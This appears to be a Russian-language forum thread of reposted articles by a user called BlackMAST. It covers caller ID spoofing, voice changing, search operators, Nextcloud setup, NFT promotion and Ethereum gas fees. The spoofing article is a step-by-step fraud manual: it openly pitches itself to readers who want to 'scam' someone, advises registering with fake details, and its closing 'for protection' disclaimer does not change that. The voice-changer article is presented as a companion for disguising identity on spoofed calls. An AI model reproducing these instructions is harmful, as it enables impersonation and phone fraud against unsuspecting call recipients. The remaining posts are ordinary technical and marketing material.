"После всего этого унижения, через кровь, пот и слезы за российской решеткой, несмотря ни на что, я верю, что я почти победил в этом ужасающем раунде. В то же время я считаю, что это было послание от Вселенной, которое я принял достойно. Теперь мой черед бросать кости, бросить вызов - я обращаюсь к дикой Метавселенной, со всей ее неограниченностью и разнообразием: пусть игра начнется".
Вам возможно будет это интересно:
NFT - феномен в мире криптовалют
Бум цифрового искусства NFT
https://telegra.ph/Kak-NFT-izmenili-...dozhnika-02-26
BlackMAST
24.03.2022, 18:44
https://i.gyazo.com/cb782344113679fc16e4b7619b57eccd.jpg
Как подделать номер телефона
Вступить в наш чат
Хочешь заскамить человека, подделав номер входящего звонка и страну? Тогда эта статья придется тебе по вкусу, потому что сегодня мы научимся менять номер вызывающего абонента или заниматься спуфингом.
https://i.gyazo.com/1c05e7798bf807cbb8ec81eef43e2cc2.jpg
В переводе с английского spoofing - кибератака с подменой. Выделяют разные виды спуфинга:
Caller ID Spoofing (подмена номера входящего вызова)
Text Message Spoofing (подмена сообщений)
IP Spoofing (подмена IP-адреса)
Website Spoofing (подмена сайта)
DNS Server Spoofing (подмена DNS-сервера)
Email Spoofing (подмена адреса электронной почты)
GPS Spoofing (подмена GPS)
В этой статье мы же выделим один из основных видов мошенничества - Caller ID Spoofing.
https://i.gyazo.com/ae9f4df61f17b8874be4336b0de2df4e.jpg
Мануал:
1. Регистрация
Первым действием вам, конечно же, нужно включить VPN. Это необходимо не только для вашей безопасности, но и для того, чтобы зарегистрироваться на сайте CallWithUs, в противном случае вы не сможете зайти на него. Это не единственный сервис для совершения звонков с подменой номера. Также можно выделить и Sip24.pw.
Сегодня же мы вам покажем, как работает спуфинг на примере CallWithUs. Как только вы зашли на сайт, нажмите в верхней панели кнопку "Sign Up", для регистрации используйте левые данные и временную почту. Например, Temp Mail.
2. Устанавливаем X-Lite
X-lite - это популярный бесплатный программный sip телефон для Windows, MacOs и Linux. X-lite на ваш компьютер можно скачать тут.
После того как скачали и установили, заходим во вкладку "VoIP Accounts" и берем оттуда данные для входа на X-lite.
3. Цена
Для того, чтобы программа работала, необходимо пополнить баланс на CallWithUs. Цены довольно низкие, вы сами создаете свой собственный план обслуживания, включая только те функции, которые вам нужны. Ежемесячного и безлимитного пакетов нет, вы платите только по факту в отличие от многих других телефонных компаний.
4. Настраиваем X-Lite
Запускаем приложение X-Lite, нажимаем на "SIP Account" и затем прописываем следующее:
User ID - @CALLWITHUS_USERNAME@ Domain - sip.callwithus.com Password - @CALLWITHUS_PASSWORD@
5. Выбираем страну
Для того, чтобы выбрать страну входящего звонка, вам нужно нажать "Speed Dial" -> "Select Dialing rule". Если хотите ее поменять, то замените "0" на код страны. Например: 7 - Россия.
6. Устанавливаем номер
Теперь осталось только выбрать номер телефона. Для этого открываем вкладку "Add Caller" и напротив "VoIP Account" вписываем любой номер и подтверждаем "true".
Готово! Теперь ваш собеседник увидит тот номер, который вы сами установите. Таким же образом вы можете менять код страны и номер телефона каждый раз, когда вам нужно.
Текст статьи не является призывом к действию и публикуется для ознакомления со спуфингом в целях защиты.
https://telegra.ph/Poddelyvaem-nomer-telefona-02-08
BlackMAST
25.03.2022, 16:14
https://i.gyazo.com/ade75d0b568bee827877c4a38b1c471e.jpg
Как изменить свой голос при телефонном разговоре?
Вступить в наш чат
Причин из-за которых вам может понадобится изменить свой голос довольно много: начиная от безобидного розыгрыша и заканчивая чем-то похуже. Зачастую смена номера телефона и голоса работают в тандеме. Вы не можете звонить с левого номера, но при этом говорить своим голосом. Думаю, что нет нужды объяснять почему так делать нельзя. В прошлой статье мы научились подделывать номер телефона, поэтому сейчас самое время поговорить про изменение голоса.
Когда разговор заходит про специальные программы по изменению голоса, то стоит упомянуть, что большинство из них заточены под пранки, т.е. максимум, что вы сможете сделать - это наложить определенные звуковые эффекты поверх вашего голоса (хомяк, робот, президент). Если вашей целью не стоит розыгрыш друга, то такие программы вам мало чем могут помочь. Найти хорошую программу для смены голоса очень трудно, но нам удалось это сделать и сегодня мы поделимся ею с вами.
MorphVox Pro
MorphVox Pro считается ̶о̶д̶н̶о̶й̶ ̶и̶з̶ ̶с̶а̶м̶ы̶х̶ ̶л̶у̶ч̶ш̶и̶х̶ самой лучшей программой для изменения голоса. (И да, это не реклама.) Несмотря на простой внешний вид в вашем распоряжении большое количество функций и многоуровневая настройка звучания, благодаря которой вы можете изменить свой голос до неузнаваемости и при этом сохранить естественность звучания. Секрет естественного звука кроется в новаторской системе подстройки звука под речь другого человека, чьи параметры уже есть в его базе. Помимо базовых настроек вы также можете установить дополнительные аддоны для увеличения функциональности. Они добавляются через встроенный менеджер, находящийся в меню.
Несмотря на наличие фэнтезийных настроек, есть конфигурации, которые в прямом смысле этого слова помогут вам побывать в "шкуре" другого человека.
Дополнительные возможности
Данная программа имеет ряд и других возможностей помимо главной - изменение голоса в реальном времени.
Ручная настройка. Незаменимая функция, с помощью которой вы можете создать свой собственный уникальный голос или же видоизменить настройки готовых голосов.
Фоновые эффекты. Во время разговора мы можете наложить любые аудиоэффекты так, чтобы собеседник думал, что вы находитесь в определенном месте (в аропорту, в магазине, на улице и т.д.).
Файлы. Если вам нужно изменить звук уже у готовой аудио или видеозаписи, то у вас есть такая возможность. Просто загрузите файл, после чего он будет обработан и сохранен в указанном пользователем месте.
Настройка голоса
Сейчас мы с вами разберем настройку голоса и основные параметры.
1. В меню слева есть уже готовые шаблоны голосов, нажмите "Voice Selection" и просто выберите нужный пол, например, мужской. Если вам не нравятся стандартные голоса и готовые настройки, то вы всегда можете скачать дополнения. Просто перейдите "Voice Selection" -> "Get more voices".
https://i.gyazo.com/eddc00dc93572fceccfae1bed38cbe47.jpg
2. После выбора пресета вы можете оставить его изначальные настройки (но мы так делать не будем) или покрутить ползунки в "Tweak Voice". Чтобы изменить тон голоса, увеличить или уменьшить, подвигайте ползунок "Pitch shift". Для настройки тембра используйте "Timbre" -> "Shift" -> "Strength". Если вы хотите сохранить изменения, то нажмите на "Update Alias".
https://i.gyazo.com/4208ca37a4f982a84d0a54c37447f767.jpg
3. Далее советуем настроить частоты звука с помощью эквалайзера. Для него уже есть несколько настроенных шаблонов для более низких и высоких частот в разделе "Preset".
https://i.gyazo.com/a89bdf9a7eac6a38fc8caa34ab44b615.jpg
https://i.gyazo.com/6855fb34488da9a542293f1f112f5716.jpg
Если готовые настойки не для вас, то опять же на помощь приходит ручная настройка, остается только подобрать частоту с помощью 10 ползунков, а изменения сохранить кнопкой "Update Alias".
4. Улучшаем звук и подавляем шум. В "Sound Settings" есть ряд возможностей для улучшения звучания вашего голоса. И кроме этого вы можете убрать те шумы, которые возникают при нахождении в общественных местах.
https://i.gyazo.com/0bfcb19283b4a00c0379b87a46f05a6d.jpg
На этом наша настройка заканчивается. Программа MorphVox Pro легкая в использовании, поэтому вы без проблем сможете настроить голос по своему усмотрению, даже будучи новичком.
Плюсы
Простой и многофункциональный интерфейс;
Наличие дополнительных возможностей;
Гибкая настройка голоса.
Минусы
1. Программа платная. Но мы можете воспользоваться пробным периодом - 7 дней. Если же вы все-таки решите приобрести данную программу, то она обойдется вам почти в 40 долларов;
https://i.gyazo.com/600515be051bb7363ac5b2aea61e5a82.jpg
2. Программа только на английском языке.
Итог
Безусловно, это не единственная программа с подобным функционалом, но она по праву считается лучшей благодаря естественной настройки звучания. У вас не должно возникнуть никаких сложностей в использовании, разве что только придется действовать методом научного "тыка" из-за большого количества ползунков.
На этом все. Удачи, друзья!
https://telegra.ph/Kak-izmenit-svoj-...azgovore-02-23
BlackMAST
31.03.2022, 14:58
https://i.gyazo.com/021312149bedc11c8715988f0d90dff1.jpg
Как быстро найти данные в бесконечном потоке информации
Вступить в наш чат
Поисковые системы (Google, Yandex) ежедневно используются миллиардами людей для нахождения какой-либо информации. Но мало кто знает о скрытых возможностях, которые упрощают поиск, освобождая его от лишний информации, а также экономят ваше время. Речь в сегодняшней статье пойдет о поисковых операторах.
Как работают поисковики?
Выделяют три основных этапа работы поисковых систем:
Сканирование. За первый этап отвечает поисковой робот или паук. Он собирает и отбирает информацию с сайтов, анализирует изменения в контенте, URL-адреса, а также код и карты сайтов. Все это делается для того, чтобы определить тип отображаемой информации.
Индексация. Как только сканирование завершается, индексатор организовывает и совершает быстрый поиск по собранной информации, т.е. анализирует данные сайта.
Поисковик. На последнем этапе происходит сортировка сайтов в зависимости от предпочтений запроса, качества и степени соответствия. Таким образом, перед нами предстает контент на странице результатов поиска.
Поисковые операторы
Что такое операторы информации и зачем они нужны?
Поисковые операторы - это специальные слова, символы, фразы, включенные в поисковой запрос, помогают конкретизировать запрашиваемую информацию для выдачи максимально точного результата. Главная их задача - это отфильтровывать запросы с определенным содержимым, сузить данные, исключая ненужную информацию. Вы можете комбинировать операторы друг с другом, чтобы поиск был еще продуктивнее.
Google
Простые поисковые операторы:
+ запрос по нужным словам в одном предложении. Оператор "плюс" помогает в конкретизации поиска. Например, возьмем слово "ключ", которое имеет несколько значений, поэтому чтобы получить тот результат, которые нам нужен, мы уточним запрос: ключ +скрипичный, ключ +родник, ключ +гаечный. В итоге вы получаете те сайты, в которых есть полный набор слов из запроса.
https://i.gyazo.com/99409c2f3e884ed9a0c3a66437d7bf79.jpg
- оператор "минус" наоборот исключает слово из запроса. Делая запрос "Ключ -скрипичный", вы получите любую информацию кроме скрипичного ключа.
https://i.gyazo.com/3e1e74fafb2a3ff4d4d93d65dcc37f7a.jpg
"" показывают только те страницы, где фраза идет в точно написанной последовательности.
https://i.gyazo.com/3b18688f5372e372ba108af9c5a165f1.jpg
| (OR) оператор «или», вы можете использовать любой из двух вариантов, чтобы получить запрос по нескольким словам одновременно или по одному из предложенных
https://i.gyazo.com/66a0fd16d31c23701e55e9a1cc6f3e3f.jpg
.. две точки отображают результаты поиска, имеющие конкретных цифровой диапазон. Также обратите внимание, что мы комбинировали 2 поисковых оператора.
https://i.gyazo.com/d41af21896e57a136f83cf5f171f8d73.jpg
@и# – операторы для поиска информации в соц. сетях по тегам и хештегам.
https://i.gyazo.com/0e116e8cd2d00a3cb4d7886817a52e06.jpg
Сложные поисковые операторы:
site:оператор, который ищет информацию на определенном сайте.
https://i.gyazo.com/b93ce863d2779f3cde3ab0ae85bb2a77.jpg
related: оператор для поиска сайтов с похожим контентом.
https://i.gyazo.com/bd07ad6a2b1447af5f1f0e37303e5b1a.jpg
intitle: поиск страниц по заголовку.
https://i.gyazo.com/8da966093282f7471794af5dc005a645.jpg
allinurl: оператор, с помощью которого легко найти сайты, содержащие в адресе страницы указанные слова. Для большего отображения страниц лучше всего использовать транслитерацию, либо латиницу.
https://i.gyazo.com/e2da4ed447bd7b85ea0540cf49ff325e.jpg
allintext: поиск по содержимому страницы. Хороший способ найти сайт, если его адрес вы забыли.
https://i.gyazo.com/f7866f8031d837f1264d0b6084590b9f.jpg
intext: поиск как и с предыдущем оператором, только выборка страниц производится по текстовому описанию для одного слова.
info: служит для показа всей информации об адресе.
allinanchor: отбирает страницы с ключевыми словами.
inanchor: похожий оператор, который ищет только по одному заданному слову.
Яндекс
Поисковые операторы:
+ оператор "плюс" работает так же как и у Google.
! используется перед нужным словом для его точного отображения в поиске без изменений.
"" показывают только те страницы, где фраза идет в точно написанной последовательности, как и в Google.
* используется для замещения слов в фразах, песнях, цитатах. Помогает в случае, если вы забыли нужное слово.
( ) оператор "скобки" служит для группировки слов в сложных запросах.
& ставится между двумя словами, а поисковик ищет страницы, где эти слова находятся в одном предложении.
title: оператор, который ищет по заголовкам сайтов.
mime: помогает найти документы нужного формата, к примеру mime
https://darkmoney.one/images/smilies/tongue.gif
df.
site: выборка по всем страницам сайта.
inurl: находит страницы только с ключевыми словами данного домена.
Как составлять запрос:
Искать в разных поисковых системах;
Искать одну и ту же информацию на разных языках (английский);
Менять порядок слов;
Использовать синонимы;
Ну и, конечно же, использовать поисковые операторы.
https://telegra.ph/Kak-bystro-najti-...formacii-03-30
BlackMAST
07.04.2022, 15:03
https://i.gyazo.com/c0af467638f843ec7dcefeb80ba23681.jpg
Вступить в наш чат
Nextcloud - это альтернатива Dropbox, Google Drive, Onedrive со своими значительными преимуществами. Это программное обеспечение с открытым исходным кодом, которое позволяет хранить личные данные, не переживая за их безопасность, так как информация хранится на подконтрольном сервере. Самой интересной фишкой данного хранилища является то, что оно может выступать не только в роли файлового хостинга, но и закрытого сообщества, где вы можете общаться с помощью аудио и видео звонков, переписываться или вовсе превратить хранилище в рабочее пространство. Доступ к Nextcloud возможен с любых устройств, например, с телефона или компьютера.
https://i.gyazo.com/70b68f88c8fd31c1036a9bf702519085.jpg
Сегодня мы научимся настраивать облачное хранилище менее чем за пол часа.
Скачать Nextcloud
Устанавливаем Next Cloud
В качестве серверной системы мы будем использовать Ubuntu 20.04.
Настройка будет осуществляться с помощью системы пакетов Snap. Она по умолчанию доступна в Ubuntu 20.04. Это означает, что процесс установки будет максимально простым., так как вместо установки и настройки веб-сервера и сервера базы данных и настройки приложения Nextcloud для работы с ними мы можем установить пакет snap, который автоматически настроит все системы.
Чтобы загрузить пакет Nextcloud snap и установить его в системе, введите:
sudo snap install nextcloud Пакет Nextcloud будет загружен и установлен на ваш сервер. Вы можете проверить успешность установки посредством вывода изменений, связанных с пакетом snap:
snap changes nextcloud
Output ID Status Spawn Ready Summary 4 Done today at 16:12 UTC today at 16:12 UTC Install "nextcloud" snap Информация о состоянии и сводная информация показывают, что установка была выполнена без проблем.
Дополнительная информации о Nextcloud SnapЕсли вам нужна дополнительная информация о Nextcloud snap, вам могут помочь несколько полезных команд.
Команда snap info показывает описание, доступные команды управления Nextcloud, установленную версию и отслеживаемый канал snap:
snap info nextcloud Посмотреть сетевые интерфейсы пакета:
snap interfaces nextcloud Результат:
Output Slot Plug :network nextcloud :network-bind nextcloud - nextcloud:removable-media Посмотреть список служб пакета:
cat /snap/nextcloud/current/meta/snap.yaml
Настраиваем учетную запись NextcloudСоздание учетной записи Администратора:
sudo nextcloud.manual-install имя пароль Вместо «имя» вводим имя администратора учетной записи и вместо слова «пароль» вводим непосредственно придуманный пароль для учетной записи.
Следующее сообщение указывает, что настройка Nextcloud выполнена правильно:
Output Nextcloud was successfully installed После установки Nextcloud нам необходимо настроить доверенные домены, чтобы Nextcloud реагировал на запросы с использованием доменного имени или IP-адреса сервера.
Настраиваем доверенные домены
Первый способ:
Для доступа к Nextcloud мы будем использовать доменное имя сервера или IP-адрес, и поэтому нам нужно изменить эту настройку, чтобы можно было применять запросы этого типа.
Вы можете просмотреть текущие настройки, запросив значение массива trusted_domains:
sudo nextcloud.occ config:system:get trusted_domains
Output localhost В настоящее время в массиве содержится только первое значение localhost. Мы можем добавить запись для доменного имени или IP-адреса нашего сервера, введя следующее:
sudo nextcloud.occ config:system:set trusted_domains 1 --value=example.com
Output System config value trusted_domains => 1 set to string example.com Если мы снова запросим значение trusted domains, мы увидим уже две записи:
sudo nextcloud.occ config:system:get trusted_domains
Output localhost example.com
Второй способ:
Если у вашего сервера Nextcloud нет доменного имени, вы можете защитить веб-интерфейс, создав сертификат SSL с собственной подписью. Этот сертификат обеспечит доступ к веб-интерфейсу через шифрованное соединение, но не сможет подтверждать подлинность вашего сервера, и поэтому ваш браузер может вывести предупреждение при попытке открыть сервер.
Чтобы сгенерировать сертификат с собственной подписью и настроить Nextcloud для его использования, введите:
sudo nextcloud.enable-https self-signed
Output Generating key and self-signed certificate... done Restarting apache... done Показанный выше результат означает, что Nextcloud сгенерировал и активировал сертификат с собственной подписью.
Теперь, когда вы защитили интерфейс, откройте веб-порты брандмауэра, чтобы разрешить доступ к веб-интерфейсу:
sudo ufw allow 80,443/tcp
Настройка успешно завершена.
Входим в Nextcloud
Поскольку вы уже настроили учетную запись администратора из командной строки, вы перейдете на страницу входа Nextcloud. Введите учетные данные, которые вы создали для администратора:
https://i.gyazo.com/def32381d1a9a2c8d5b7c17c755673bd.jpg
Нажмите кнопку "Войти" для входа в Nextcloud.
При первом входе откроется окно с приветственным текстом и ссылками на различные клиенты Nextcloud:
https://i.gyazo.com/d935caa94c211e89097309bfc6d546e8.jpg
Загрузите любые клиенты, которые вам интересны. Далее вы перейдете в главный интерфейс Nextcloud, где сможете выгружать файлы и управлять ими:
https://i.gyazo.com/579fb321fccbdf63e298a02605858781.jpg
Дополнительные настройки NextCloud
В NextCloud доступно огромное количество приложений для расширения функциональности:
Auto Groups – автоматическое добавление пользователей в группы;
Checksum – вычисление хеш-сумм файлов (md5, sha1, sha256, sha384, sha512 и crc32);
Music – удобный аудио плеер;
News – приложение для чтения новостей с помощью формата RSS/Atom;
ONLYOFFICE – офисное приложение для создания и редактирования документов. Созданные документы автоматически сохраняются в облаке;
Registration – добавление опции регистрации на главной странице;
Social login – регистрация с помощью соц. сетей;
Social – чат;
Talk – видео и аудио звонки, создание комнат для обсуждения. Для мобильных устройств доступно отдельное приложение.
В следующей статье мы более подробно рассмотрим начало работы в Nextcloud, полезные фишки и различные настройки.
Заключение
Nextcloud - это многофункциональное программное обеспечение, которое является не только облачным хранилищем, но и целой сетью, где можно общаться, слушать музыку, работать и совершать конференции. И самое главное, что все данные хранятся в защищенном месте, которое вы сами и контролируете.
BlackMAST
11.04.2022, 21:26
https://i.gyazo.com/14659b57e95363fa5fe8553d283038c4.jpg
Вступить в наш чат
Nextcloud - это не просто облачное хранилище, а это целое сообщество, где можно чатиться, совершать аудио и видео звонки, и при этом оставаться анонимным.
В прошлой статье мы научилисьнастраивать Nextcloud, а сегодня поговорим об основных функциях,
о которых вам следует знать.
https://i.gyazo.com/cedee2c83d3f3327bcea86bd09bd52a2.jpg
Начало работы
После установки Nextcloud выглядит как обычное файловое хранилище.
Но это легко поправимо, мы покажем как установить на него дополнительные приложения, чтобы повысить его функциональность. В правом верхнем углу нажимаем на иконку пользователя и выбираем "Приложения"
https://i.imgur.com/Qflv0ik.jpg
https://i.gyazo.com/526e09836c2947d90748aa4c77d55105.jpg
В разделе «Пакеты приложений»находится огромный список программ. Узнать подробнее о каждой программе можно, нажав на ее заголовок. Нам же более интересен «Основной набор приложений» : вы можете можно включить как все приложения, так и отдельные. Затем введем пароль администратора, и установка начнется. По ее завершению иконки приложений вы найдете в верхней панели.
Как добавить учетные записи
Для того, чтобы использовать Nextcloud совместно с другими пользователями, вам нужно добавить их учетные записи. Сделать это можно, выбрав в правом верхнем углу иконку администратора -> «Пользователи»:
https://i.gyazo.com/54bb46aea0bef4075f1ecd6cf38143f7.jpg
Для удобства можно создать дополнительные группы, чтобы установить уровень доступа. По умолчанию есть группа «Администраторы» с полным доступом к приложению, но вы можете создать, например, группу «Сотрудники» и добавлять туда учетные записи с лимитированным доступом, например, тех, кому пользоваться приложениями можно, а менять настройки Nextcloud уже нельзя:
https://i.gyazo.com/61b2f7b6d281e623ce7ebd8498818ca3.jpg
Придумываем логин, указываем отображаемое имя, пароль, почтовый ящик, присваиваем группу и устанавливаем ограничение дискового пространства для каждого пользователя.
Как настроить дополнительные инструменты
После того как добавили пользователей, переходим к настройке дополнительных функций.
Календарь
Календарь может понадобится для работы: указать конкретные задачи, обозначить сроки и т.д. Попасть в раздел календаря вы можете в верхнем меню приложений:
https://i.gyazo.com/7c75d21921f15011932a2f6192d1ec71.jpg
Импорт готового календаря
Допустим, у вас уже есть готовый календарь со всеми событиями и задачами, и вы только хотите загрузить его в Nextcloud. Для этого экспортируйте его в файл .ics и загрузите в наше приложение в разделе Параметры и импорт -> Import Calendar.
https://i.gyazo.com/11c729ed958363836da60bea37ba4276.jpg
Создание нового календаря
Если готового календаря у вас нет, то давайте создадим новый таким способом:
https://i.gyazo.com/2c985ebeda77efec3045ebfa2077c35f.gif
1. Кликните на кнопку + Создать календарь в левой части экрана.
2. Запишите название, например, Работа.
3. Нажмите на «галочку» - календарь будет создан, а все события будут доступны с любых устройств для всех пользователей, которых подключите к нему.
Подключить пользователей к календарю можно вручную, добавляя каждого отдельно или всю группу, например, «Сотрудники». Но вы также можете предоставить доступ к календарю с помощью ссылки -> "Поделиться ссылкой". После того, как пользователи перейдут по ссылке, они сами автоматически добавятся к календарю.
https://i.gyazo.com/452ede769ecc5a6c10265c00104e64b6.jpg
Задачи
Стоит отметить, что календарь и сам неплохо справляется с этой функцией, но если вам нужно более четкое структурирование задач и отслеживание их выполнения, вы можете воспользоваться инструментом Deck.
https://i.gyazo.com/79b781ca717723a7461da5fcc7635874.jpg
На скрине выделена кнопка +Создать рабочую доску, а еще "Поделиться»" и "Параметры" для уже готовых досок.
Если вы "Поделитесь" ссылкой, то автоматически разрешите доступ конкретному человеку или группе пользователей.
https://i.gyazo.com/f4a0c6caf579670855aebe0a67580a74.jpg
На странице "Параметры" вы можете вносить любые изменения: переименовать доску, удалить ее или добавить в архив. В созданной доске каждый желающий пользователь с доступом может вносить изменения в задания. Сначала создаются списки с категориями заданий, в каждый список можно добавлять карточки со списками конкретных задач.
Далее составляются списки заданий, в каждом из них можно добавлять карточки с определенными заданиями. С помощью меток статуса можно определить статус задания и его выполнение. Также к каждой задаче можно прикреплять сотрудника, устанавливать срок выполнения, загружать дополнительные файлы и приложения.
BlackMAST
14.04.2022, 18:54
https://i.imgur.com/DTzVHCJ.jpg
Вступить в наш чат
NFT-токен - это уникальный, подлинный цифровой актив, который нельзя заменить на любой другой. Поскольку спрос на невзаимозаменяемые токены стремительно растет, вы можете не только инвестировать в NFT, но и попробовать создать свои собственные. Если вы это уже сделали, то наверняка столкнулись со следующей проблемой: "Как их продвигать?". Заручиться поддержкой аудитории и повысить свою узнаваемость - дело не из легких. Однако, существуют способы, которые помогут вам это сделать. О них мы и поговорим в этой статье.
https://i.imgur.com/SB7ijvs.jpg
рост популярности NFT
Для начала вспомним, в виде чего мы можем создавать NFT:
Фото/видео
Арт
Музыка
Gif
Предметы в играх
Твиты
Самые дорогие NFT за всю историю
Чтобы приобрести любой NFT достаточно зарегистрироваться на любой площадке вроде Binance и создать счет. Далее смотрим доступные к покупке токены и жмем "Купить".Готово.
https://i.imgur.com/iqAk180.jpg
Если с покупкой все более менее понятно, то как быть с продажей?
Платформа
В первую очередь следует выбрать и зарегистрироваться на платформе. У каждой из них есть свои отличия и особенности, поэтому окончательное решение остается за вами. Главное, на что необходимо обратить внимание - это наличие Ethereum.
Кошелек
Затем нужно открыть свой Ethereum кошелек. Лучшими NFT-кошельками единогласно признают:
Metamask
AlphaWallet
Trust Wallet
Coinbase Wallet
Enjin
А теперь самое главное - продвижение:
Создайте блог про NFT
Главное, что вы должны знать про продвижение NFT, так это то, что оно напрямую взаимосвязано с продвижением вашего блога, т.е. вы должны продвинуться в соц. сетях перед тем, как начать продавать NFT. "Впаривать" аудитории свои токены не нужно, поначалу вы должны в стать проводником для них в мир невзаимозаменяемых токенов, так как до сих пор многие люди не имеют ни малейшего понятия, что это такое.
Запомните, что клиент никогда не купит то, о чем он не знает, поэтому взгляните на это с другой стороны, вспомните, когда вы первый раз узнали про NFT, что вам было интересно. Расскажите им, что такое NFT,метавселенная, про отличие от другой криптовалюты, самые дорогие токены, зачем нужно инвестировать в NFT и как их можно купить и продать. Чем больше образовательного контента на первых порах, тем лучше же для вас.
Где вести свой блог? Не стоит заводить аккаунты во всех социальных сетях, так как это слишком энергозатратно, достаточно сосредоточиться на 4 основных платформах, там вы сможете найти свою целевую аудиторию:
Instagram
Twitter
BitCoinTalk
Telegram
Расположив к себе подписчиков и став для них неким экспертом в области NFT, вы сможете быстрее продать свои токены в дальнейшем.
Покупайте рекламу
Иногда единожды удачно купленная реклама стоит года тщетных попыток продвинуть аккаунт. Не думайте, что, создав блог, к вам полетят тысячи подписчиков. К сожалению, так бывает, но очень редко, чаще всего продвижение стоит денег.
Но для того, чтобы не спустить эти деньги на ветер, найдите подходящего инфлюенсера, который в своем аккаунте расскажет про ваш замечательный блог. Важно, чтобы тематика ваших аккаунтов совпадала (он рассказывает про биткоины, а вы про NFT), в противном случае после такого продвижения подписчиков не прибавится. Если не хотите заморачиваться с поиском инфлюенсера, то настройтесь таргетинговую рекламу в Instagram. Ключевым словом является "таргетинговая", т.е. реклама для тех людей, которые были бы заинтересованы в покупке NFT в данный момент. Это легко делается с помощью инструментов в инстаграме.
SEO
Повысьте свою узнаваемость с помощью SEO (приемы, которые помогают поднять вас в топ рейтинга поисковых систем). Как вы собираетесь продавать NFT, если ваше имя не отображается в результатах поиска? Данный шаг очень важен, если вы хотите, чтобы клиенты вас могли найти самостоятельно.
Если вы не дружите с поисковой оптимизацией, то не раздумывая, обратитесь к SEO-специалистам.
Самопиар
Как только вы наберете N-количество подписчиков, время действовать. Расскажите клиентам про тему ваших NFT, что вы создали, какие проекты вы готовите. Делайте акцент на контент-маркетинге, так это поможет деликатно ознакомиться потенциальных покупателей с вашими токенами. Сделать самопиар ненавязчивым можнос помощью нескольких уловок:
Краткость - сестра таланта. Не пишите длинные статьи, их никто не будет читать, ваша задача - передать суть несколькими предложениями. А еще пытайтесь выражать мысли простым языком без использования заумных фраз и прочих сложностей;
Используйте слова- триггеры (с призывами). Что-то вроде "Получите бесплатный NFT", "Только сегодня скидка 50 %". Это действительно работает.
Срочность. Внушите подписчикам, что ваше предложение ограничено, сказав, что скидка действует только сегодня или предложение истекает через час. Этот способ будет работать в том случае, если вы не будете злоупотреблять им.
Красивый визуал. Это особенно актуально для инстаграма. Позаботьтесь о ярких картинках, инфографике и коротких роликах, тогда ваш пост не останется без внимания.
И, конечно же, не забывайте про дружеский настрой, будьте с подписчиками на одной волне, спрашивайте, что им было бы интересно, отвечайте на их вопросы.
NFT-маркетплейсы
Чтобы продать NFT, вы должны разместить их на нескольких маркетплейсах как на платформах, специализирующихся исключительно на NFT, та и на универсальных площадках. Чем чаще покупатели будут видеть ваши NFT, тем выше шанс, что их купят.
Список самых популярных NFT-маркетплейсов:
Foundation - для диджитал-арта;
MakersPlace - для компьютерной графики;
SuperRare - для цифровых произведений искусства;
OpenSea - для предметов искусства, фото, музыки, спортивных карточек и коллекционных гифок;
Rarible - для коллекционных крипто-предметов;
Enjin — для активов блокчейна;
KnownOrigin - для редких коллекционных предметов искусства;
MythMarket - для коллекционных карточек.
Прокачайте PR
Распространяйте информацию о своих NFT по крупным информационным площадкам, СМИ. Если нет конкретной договоренности с изданием, напишите пресс-релиз, расскажите о своих токенах и разошлите журналистам. Не ждите, что к вам постучаться в дверь с просьбой взять у вас интервью - будьте тем кто сам стучиться во все двери, стараясь ухватиться за любую возможность.
Оптимизируйте коэффициент конверсии - CRO
Все ранее перечисленное должно давать положительный эффект на конверсию, иначе ни в контент-маркетинге, ни в PPC-рекламе смысла нет. Поэтому постоянно контролируйте показатели конверсии и меняйте стратегию продвижения, если они падают, а не повышаются.
Чтобы повысить доверие к вам - публикуйте отзывы клиентов, продумывайте подачу контента (о чем конкретно писать, на каких площадках размещать, в какие дни публиковать). Таким образом, вы должны продумать каждую деталь, чтобы ваше дело принесло плоды.
Итог
Пока другие только узнают о существовании NFT, будьте теми, кто поможет им разобраться во всех тонкостях невзаимозаменяемых токенов. Не бойтесь неудач, грамотно выстраивайте свой бизнес план, дабы их избежать. Удачи!
Интересно узнать, как заключенный смог стать успешным NFT- художником, заработав миллион? - Читайте здесь.
BlackMAST
18.04.2022, 18:08
https://i.gyazo.com/c7ef048cf759d7ef47b28d74e40a1367.jpg
Вступить в наш чат
Впервые слышите такое понятие как "газ", хотя уже знакомы с криптовалютой и сетью Ethereum? Тогда эта статья для вас, мы разберемся вместе с вами, что такое GAS и зачем его платят в сети эфира.
https://i.gyazo.com/fb2f32288fae59080cfc37e559d9a42d.jpg
Что такое газ
Простыми словами, газ или GAS - это плата, которая происходит каждый раз, когда вы совершаете операции в сети эфира. Если в сети Bitcoin - комиссия, то в сети Ethereum - это газ.
Таким образом, цена на газ эфира - это обычная комиссия за покупку, добавление своего NFT, вывод денег и практически любое действие, связанное с криптовалютой. Дело в том, что комиссия, она же цена на газ, меняется ежеминутно. Почему это происходит?
Когда пользователи впервые слышат про это, у них появляется еще больше вопросов. К примеру, с Bitcoin все ясно: сеть нужна для переводов крипты, где вы сами устанавливаете комиссию - чем выше комиссия, тем быстрее поступит перевод.
Когда дело заходит про Ethereum, то стоит понимать, что главная задача сети - это поддержка выполнений смарт-контрактов. Это специальная программа для проверок переводов. Помимо это сеть эфира нужна для:
Переводов Эфириума другому пользователю;
Формирования смарт-контрактов (программ) и записи их в блокчейн;
Обеспечения работы этих смарт-контрактов (программ) .
Стоимость газа
Когда вы пользуетесь блокчейном, вы, сами того не осозновая, используете мощности компьютеров других пользователей, которые как раз и берут за это комиссию или плату за газ.
Плата за газ может изменяться, смотря на загруженность блокчейна и сложность задачи. Если помимо вас совершает транзакцию большое количество других пользователей, то цена на газ растет, так как в блокчейне эфира есть лимит на транзакции - 30 за 1 секунду. Так что, пользователи, которые не хотят ждать большой очереди, платят повышенную комиссию. Повышенный спрос на операции прямо пропорционален цене газа.
Также отмечают, что рост цены на газ может зависеть от тарифов на коммунальные услуги. Держатели компьютеров, чьими услугами вы пользуетесь, вынуждены обслуживать их, а точнее платить счета за обычное электричество.
https://i.gyazo.com/26b72f4d26194155b12f04d927453d4e.jpg
Как не платить большую комиссию
От цены за газ и лимита газа зависит скорость выполнения транзакции и, если вы поставите очень низкий процент, то время ожидания выполнения операции может увеличиться от нескольких часов до пары дней.
Для того, чтобы не переплачивать за каждую операцию, следует поставить ограничения на цену за газ и на лимит газа.
Лимит газа служит определенным ограничителем платы за перевод. Допустим, вы выставите лимит 1.000.000 газ, а смарт-контракту нужно лишь 50.000 газ, то вы и заплатите только 50.000. Лимит сделан для того, чтобы пользователь не переплатил в таком случае.
Вы сами устанавливаете цену в зависимости от того как быстро вы хотите, чтобы операция прошла. Есть хороший сервис ETH Gas Station, который служит калькулятором, позволяющим подобрать оптимальное значение цены за газ.
